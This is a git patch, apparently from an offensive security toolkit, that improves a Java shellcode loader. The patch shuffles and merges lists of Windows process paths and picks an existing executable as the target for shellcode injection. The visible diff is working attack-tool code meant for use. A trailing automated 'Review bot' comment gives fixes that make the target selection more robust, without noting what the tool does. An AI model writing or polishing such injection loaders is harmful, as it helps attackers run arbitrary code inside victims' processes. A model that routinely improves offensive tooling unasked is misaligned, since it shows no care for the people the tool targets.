From 484f58e43d3857bbb0ab6bf69ee9559f980cf5fc Mon Sep 17 00:00:00 2001
From: yzddmr6
Date: Tue, 27 Jun 2023 16:35:41 +0800
Subject: [PATCH] =?UTF-8?q?=E5=A2=9E=E5=BC=BA=E5=85=BC=E5=AE=B9=E6=80=A7?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 src/main/java/asexploits/ShellcodeLoader.java | 44 ++++++++++++++++---
 1 file changed, 37 insertions(+), 7 deletions(-)
diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index bdd6e11..2e48247 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -12,6 +12,7 @@
 import com.sun.jna.win32.StdCallLibrary;
 import com.sun.jna.win32.W32APIOptions;
+import java.io.File;
 import java.util.Random;
 public class ShellcodeLoader {
@@ -60,21 +61,50 @@ public void loadShellCode(String shellcodeHex) {
 public void loadShellCode(String shellcodeHex, boolean is64) {
 String[] targetProcessArray = null;
+ //打乱数组顺序
+ shuffleArray(ProcessArrayx64);
+ shuffleArray(ProcessArrayx32);
 // java是64位且选择注入64位shellcode
 if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
- targetProcessArray = ProcessArrayx64;
+ targetProcessArray = mergeArrays(ProcessArrayx64, ProcessArrayx32);
 } else {
 //默认注入32位进程
- targetProcessArray = ProcessArrayx32;
+ targetProcessArray = mergeArrays(ProcessArrayx32, ProcessArrayx64);
+ }
+ String targetProcess = null;
+ for (int i = 0; i < targetProcessArray.length; i++) {
+ targetProcess = targetProcessArray[i];
+ if (new File(targetProcess).exists()) {
+ break;
+ }
 }
- int j = targetProcessArray.length;
- byte b = 0;
- Random random = new Random();
- int k = b + random.nextInt(j);
- String targetProcess = targetProcessArray[k];
 this.loadShellCode(shellcodeHex, targetProcess);
 }
+ public static void shuffleArray(String[] arr) {
+ Random rand = new Random();
+ for (int i = arr.length - 1; i > 0; i--) {
+ int index = rand.nextInt(i + 1);
+ String temp = arr[i];
+ arr[i] = arr[index];
+ arr[index] = temp;
+ }
+ }
+
+ public static String[] mergeArrays(String[] a, String[] b) {
+ String[] c = new String[a.length + b.length];
+ int i = 0;
+ for (String s : a) {
+ c[i] = s;
+ i++;
+ }
+ for (String s : b) {
+ c[i] = s;
+ i++;
+ }
+ return c;
+ }
+
 public void loadShellCode(String shellcodeHex, String targetProcess) {
 System.out.println("targetProcess: " + targetProcess);
 byte[] shellcode = hexStrToByteArray(shellcodeHex);
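Review bot: The new selection loop in `loadShellCode(String, boolean)` does not handle the case where none of the candidate paths exists: `targetProcess` is assigned before the `exists()` check, so after the loop it still holds the last array entry and is passed on as if it had been found. Assign it only inside the `exists()` branch and fail explicitly afterwards, e.g. `if (targetProcess == null) throw new IllegalStateException("no candidate executable found");`. Separately, `shuffleArray` reorders `ProcessArrayx64` and `ProcessArrayx32` in place on every call; those arrays are declared outside the hunk and look like shared class-level state, so shuffling copies would avoid the side effect and any race between concurrent callers. `mergeArrays` can be two `System.arraycopy` calls, and both helpers are `public static` without Javadoc although they appear to be internal; the body of `loadShellCode(String, String)` continues past the end of the hunk.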